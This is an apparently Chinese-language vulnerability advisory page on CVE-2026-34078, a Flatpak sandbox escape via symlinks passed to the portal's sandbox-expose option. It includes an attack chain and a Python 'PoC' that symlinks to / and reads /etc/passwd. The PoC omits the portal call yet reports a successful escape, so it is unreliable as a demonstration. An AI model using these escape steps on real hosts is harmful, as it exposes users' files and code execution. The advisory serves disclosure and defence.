CVE-2026-34078 CVSS 10.0 严重

CVE-2026-34078 Flatpak沙箱逃逸漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34078

漏洞类型

沙箱逃逸

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Flatpak

漏洞概述

Flatpak是Linux系统中常用的应用沙箱和分发框架。在1.16.4版本之前，其portal组件存在严重安全缺陷。由于sandbox-expose选项接受路径参数，且未对符号链接进行严格校验，恶意应用可通过创建符号链接指向宿主机任意路径。Flatpak在运行时会挂载解析后的路径，导致沙箱隔离失效，攻击者可借此读取所有主机文件并获得主机上下文的代码执行权限。

技术细节

该漏洞的核心在于Flatpak portal对`sandbox-expose`选项中路径的处理逻辑存在缺陷。在受影响版本中，Flatpak允许应用请求暴露特定路径，但未充分校验该路径是否为应用可操控的符号链接。攻击者首先在沙箱内部构造一个指向宿主机敏感目录（如根目录`/`、`/etc`或用户主目录）的符号链接。随后，应用通过Flatpak portal接口请求挂载该符号链接。由于Flatpak守护进程在处理挂载请求时，会直接解析符号链接指向的真实路径，宿主机的敏感目录随之被挂载到沙箱文件系统中。这一过程破坏了沙箱的隔离机制，使得恶意应用能够以宿主机文件系统的权限读写敏感数据，甚至通过写入特定配置文件实现从沙箱内到宿主机上下文的代码执行，造成严重的安全后果。

攻击链分析

STEP 1

1. 恶意应用安装

攻击者诱导用户安装包含恶意代码的Flatpak应用。

STEP 2

2. 创建符号链接

恶意应用在沙箱内部创建指向宿主机敏感路径（如根目录/）的符号链接。

STEP 3

3. 请求暴露路径

应用通过Flatpak portal请求挂载包含该符号链接的路径。

STEP 4

4. 解析与挂载

Flatpak守护进程解析符号链接，将宿主机的真实目录挂载到沙箱内。

STEP 5

5. 逃逸与执行

应用通过挂载点访问宿主机文件，执行任意代码或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-34078: Flatpak Sandbox Escape
# This PoC demonstrates how a malicious app could access host files
# via symlink manipulation in sandbox-expose.

import os

# 1. Create a malicious symlink inside the sandbox pointing to the host root
# Note: In a real exploit, this path would be passed to the portal
malicious_link = "/tmp/mount_point"
target_path = "/"

try:
    # Simulating the creation of a symlink controlled by the app
    os.symlink(target_path, malicious_link)
    print(f"[+] Created symlink: {malicious_link} -> {target_path}")

    # 2. Request the Flatpak portal to expose this path
    # In a real scenario, this involves D-Bus calls to org.flatpak.portal
    # Specifically invoking methods that accept sandbox-expose flags
    print("[*] Attempting to trigger the vulnerable path resolution...")
    
    # 3. Verify access to host files (e.g., /etc/passwd)
    host_passwd = os.path.join(malicious_link, "etc", "passwd")
    if os.path.exists(host_passwd):
        print(f"[!] Successfully escaped sandbox! Reading {host_passwd}")
        with open(host_passwd, 'r') as f:
            print(f.read())
    else:
        print("[-] Exploit failed or path not exposed correctly.")

except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Flatpak < 1.16.4

防御指南

临时缓解措施

如果无法立即升级，建议暂时停止运行来源不明的Flatpak应用。用户应审查已安装应用的权限，特别是文件系统访问权限，并关注官方发布的安全补丁通知。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表